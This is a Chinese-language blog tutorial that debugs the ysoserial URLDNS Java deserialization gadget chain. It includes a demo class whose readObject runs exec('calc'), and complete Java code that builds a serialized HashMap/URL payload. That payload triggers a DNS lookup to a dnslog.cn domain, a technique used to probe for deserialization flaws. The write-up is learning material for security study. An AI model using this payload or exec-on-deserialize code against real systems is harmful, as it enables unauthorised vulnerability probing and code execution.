首页 > 其他分享 >URLDNS的反序列化调试分析

URLDNS的反序列化调试分析

时间:2023-08-11 20:44:11浏览次数:44  
标签:Java java readObject URLDNS new 序列化 调试

Java反序列化(0):URLDNS的反序列化调试分析

URLDNS链子是Java反序列化分析的第0课,网上也有很多优质的分析文章。

笔者作为Java安全初学者,也从0到1调试了一遍,现在给出调试笔记。

一. Java反序列化前置知识

Java原生链序列化:利用Java.io.ObjectInputStream对象输出流的writerObject方法实现Serializable接口,将对象转化成字节序列。

Java原生链反序列化:利用Java.io.ObjectOutputStream对象输入流的readObject方法实现将字节序列转化成对象。

测试源码如下,此部分源码参考了ol4three师傅的博客

package serialize;

import java.io.*;

public class deserTest implements Serializable {
    private int n;
    public deserTest(int n) {
        this.n=n;
    }

    @Override
    public String toString() {
        return "deserTest2 [n=" + n + ", getClass()=" + getClass() + ", hashCode()=" + hashCode() + ", toString()="
                + super.toString() + "]";
    }

    // 反序列化
    private void readObject(java.io.ObjectInputStream in) throws IOException,ClassNotFoundException{
        in.defaultReadObject();					
        Runtime.getRuntime().exec("calc");			
        System.out.println("test");
    }

    public static void main(String[] args) {
        deserTest x = new deserTest(5);
        operation1.ser(x);
        operation1.deser();
        x.toString();
    }
}


// 实现序列化和反序列化具体细节的类
class operation1{

    // 将输出字节流写入文件中进行封存
    public static void ser(Object obj) {
        // 序列化操作,写操作
        try {
             // 首先文件落地object.obj存储输出流,绑定输出流           
            ObjectOutputStream ooStream = new ObjectOutputStream(new FileOutputStream("object.obj"));

            // 重定向将输出流字节写入文件
            ooStream.writeObject(obj);
            
            ooStream.flush();
            ooStream.close();

        } catch (FileNotFoundException e) {
            e.printStackTrace();
        }catch (IOException e) {
            // TODO: handle exception
            e.printStackTrace();
        }
    }
    
    
    public static void deser() {
        // 反序列化,读取操作
        try {
            // 绑定输入流
            ObjectInputStream iiStream = new ObjectInputStream(new FileInputStream("object.obj"));
            
            // 反序列化时需要从相关的文件容器中读取输出的字节流
            // 读取字节流操作为readObject,所以重写readObject可以执行自定义代码
            Object xObject = iiStream.readObject();
            iiStream.close();
        } catch (IOException e) {
            // TODO: handle exception
            e.printStackTrace();
        } catch (ClassNotFoundException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }
    }
}

image-20230622200428296

二. ysoserial环境搭建

IDE就直接用JetBrains的IDEA就行

直接拿Java安全payload集成化工具ysoserial进行分析,这里面已经有现成的环境了

https://github.com/frohoff/ysoserial

注意配置好相应的JDKSDK版本:image-20230704224019895

三. URLDNS攻击链

  • 影响的版本问题:与JDK版本无关,其攻击链实现依赖于Java内置类,与第三方库无关
  • URLDNS这条反序列化链只能发起DNS请求,无法进行其他利用,可以作为验证是否有反序列化漏洞的姿势
调试分析

Gadget Chain:

Deserializer.deserialize() -> HashMap.readObject() -> HashMap.putVal() -> HashMap.hash() ->URL.hashCode() ->

getHostAddress()

在getHostAddress函数中进行域名解析,从而可以被DNSLog平台捕获

URLDNS程序入口

ysoserial-master\src\main\java\ysoserial\payloads\URLDNS.java路径下有URLDNS.java文件

main主函数的run函数打断点进入

image-20230704233815765

这个ysoserial-masterpayload运行结构大致是有一个专门的PayloadRunner运行程序,然后统一调用来运行各部分的payload

首先是进行序列化:

image-20230706141716624

image-20230706142531102

继续往下,生成command,由于是分析URLDNS攻击链,所以只需要修改将返回值为dnslog的临时地址

image-20230706142701137

创建实例后,进入到URLDNSgetObjectpayload函数

image-20230706143357422

getObject函数中应该注意的是:声明了HashMap对象和URL对象,并进行put哈希绑定,最后设置作用域

image-20230706170830440

image-20230706204403039

反序列化链子:

在反序列化入口处打断点:

image-20230706195621770

在反序列化时调用了readObject函数

image-20230706201128369

然后进入HashMap.javareadObject函数

image-20230706201250160

readObject中调试到此行,了putval,在此处IDEA这个IDE可以选择进入的函数,直接进入后者hash

由于我们读入字节序列,需要将其恢复成相应的对象结构,那么就需要重新putval

image-20230706201454673

传入的key不为空,执行key.hashCode

image-20230706211639259

进一步在URL.java文件下

image-20230706203125428

进入URLStreamHandlerhashCode

image-20230706203401159

image-20230706202850373

产生解析:

image-20230706203000482

总的来说,利用链思路如下:

在反序列化URLDNS对象时,也需要反序列化HashMap对象,从而调用了HashMap.readObject()的重写函数,重写函数中调用了哈希表putval等的相关重构函数,在hashcode下调用了getHostAddress函数

那么反之,为什么首次声明的时候没有调用到了getHostAddress函数,现在给出声明时的函数路线:

ht.put() --> .. --> SilentURLStreamHandler.getHostAddress()

该函数为空实现

列出几个路线上的关键函数看看:

image-20230706214936664

image-20230706214859555

由于此处keyString类型,则进入String.hashCode

相比之下,在反序列化中keyURL类型

image-20230706215923777

设置了不发起dns解析

image-20230706221106262

image-20230706214558083

具体执行流,可以看下时序图,我就不讲了^^

image-20230706214734409

四. URLDNS链的使用

import java.io.*;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;

public class Main{


    // 序列化前不发生dns解析
    static class SilentURLStreamHandler extends URLStreamHandler{
        protected URLConnection openConnection(URL n) throws IOException{
            return null;
        }

        protected synchronized InetAddress getHostAddress(URL n)
        {
            return null;
        }
    }

    public static void main(String[] args) throws Exception{

        HashMap hashMap = new HashMap();

        // 设置put时不发起dns解析
        URLStreamHandler handler = new Main.SilentURLStreamHandler();
        URL url = new URL(null, "http://jloqk8.dnslog.cn", handler);


        // 利用Java反射机制在动态执行时获取类
        Class clazz = Class.forName("java.net.URL");
        Field f = clazz.getDeclaredField("hashCode");
        f.setAccessible(true);

        hashMap.put(url, "123");
        f.set(url, -1);

        // 对象输出流绑定文件输出流
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("out.bin"));
        oos.writeObject(hashMap);	// 序列化

        // 对象输入流绑定文件输入流
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("out.bin"));
        ois.readObject();			// 反序列化

    }

}

image-20230706222309238

五. 参考链接

  1. https://mp.weixin.qq.com/s?__biz=MzkzMjIxNjExNg==&mid=2247484593&idx=1&sn=af18249e33ce1fcb5a7a7e291539fb5b&chksm=c25e68eaf529e1fcd6d0aa44669701f6b3f500879981068739e7da7db9231aef58046d21a7b1&mpshare=1&scene=23&srcid=07062zWZwVvMV7sBFtUKJmnY&sharer_sharetime=1688647927861&sharer_shareid=5d34a82156e695048b7333a05ed3ea5a#rd

  2. https://www.yulate.com/275.html

  3. https://fireline.fun/2021/06/04/Java ysoserial学习之URLDNS(一)/#0x03-代码模拟

标签:Java,java,readObject,URLDNS,new,序列化,调试
From: https://www.cnblogs.com/icfh/p/17623903.html

相关文章

  • springboot~alibaba.fastjson2序列化时过滤字段
    当我们使用阿里的alibaba.fastjson2进行json序列化时,你可以通过方法参数PropertyFilter来实现对字段的获取,将需要序列化的字段写到PropertyFilter对象里,当然也可以将不进行序列化的写到这里,进行逻辑非操作即可实体classPerson{privateStringfirstName;privateStr......
  • 强行修改 ELF 文件后使用 GDB 进行源码级调试的方法
    使用patchelf命令修改目标文件ld、libc。patchelf--set-interpreter/mnt/hgfs/Share/ld.so--replace-neededlibc.so.6/mnt/hgfs/Share/libc.sopwn.elfGDB直接载入文件。gdbpwn.elf在GDB中设置debug-file-directory及directories,其中debug-file-directory为.buil......
  • .NET下的终极反调试
    title:.NET下的终极反调试date:2018-12-22updated:2023-04-12lang:zh-CNcategories:-[.NET逆向]tags:-.NET-逆向工程-反调试toc:true文章首发于https://wwh1004.com/net-ultimate-anti-debugging/本文介绍了.NET下的反调试原理,包括CLR内部调试机制。通过本......
  • Idea 运行或调试模式,可以指定不同的类库(版本)目录,-Djava.library.path
    Idea不同的项目下运行或调试模式,可以指定不同的类库(版本)目录(可以避免系统变量影响不同项目引用不同版本),-Djava.library.path,如下图: ......
  • 序列化
    什么是序列化我们把对象(变量)从内存中变成可存储或传输的过程称之为序列化,在Python中叫pickling,在其他语言中也被称之为serialization,marshalling,flattening等等,都是一个意思。为什么要序列化1.持久保存状态需知一个软件/程序的执行就在处理一系列状态的变化,在编程语言中,'状......
  • delphi 自带的JSON序列化类
    unitUnit1;interfaceusesWinapi.Windows,Winapi.Messages,System.SysUtils,System.Variants,System.Classes,Vcl.Graphics,Vcl.Controls,Vcl.Forms,Vcl.Dialogs,System.JSON.Serializers,Vcl.StdCtrls;typeTForm1=class(TForm)Memo1:TMemo......
  • Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
    Vulhub-Docker-Composefileforvulnerabilityenvironment1、介绍名称:WeblogicWLSCoreComponents反序列化命令执行漏洞(CVE-2018-2628)编号:CVE-2018-2628原理:应用:Weblogic 版本:Weblogic10.3.6.0,Weblogic12.1.3.0,Weblogic12.2.1.2,Weblogic12.2.1.32、测试2.......
  • 强大的前端设计开发调试效率工具
    介绍十个软件,适合前端开发跟网页设计者使用,能提高效率的软件。自己挑去吧。这人为什么这么值得我去介绍,因为她整了很多有趣的玩意儿,而且很实用。======11-2723:52更新:根据反馈情况加上推荐指数,★表示10分,☆表示5分或未评价,仅做参考=====1、LinrDevTools给设计师用的调试工具(☆)这......
  • 【译】摇摆你的调试游戏:你需要知道的 Parallel Stack Window 小知识!
    在VisualStudio202217.6和17.7中,我们在 ParallelStack窗口中添加了大量新功能,可以将您的多线程调试提升到一个新的水平。但是ParallelStack窗口能为您做些什么呢?答案很简单——它提供了关于代码如何在多线程、并行或异步环境中运行的有价值的观察。随着多线程......
  • vs安装web环境遇到的问题-----调试器dll msdbg2.dll 未正确安装
    首先,你要找到msdbg2.dll。一般就在%CommonProgramFiles%\MicrosoftShared\VS7Debug”目录下。找找先,实在不行搜索吧;如果没有直接下载一个,有的也需要执行以下操作:msdbg2.dll文件拷贝一份到windows/system32目录下,然后在运行中regsvr32msdbg2.dll,重启vs即可。......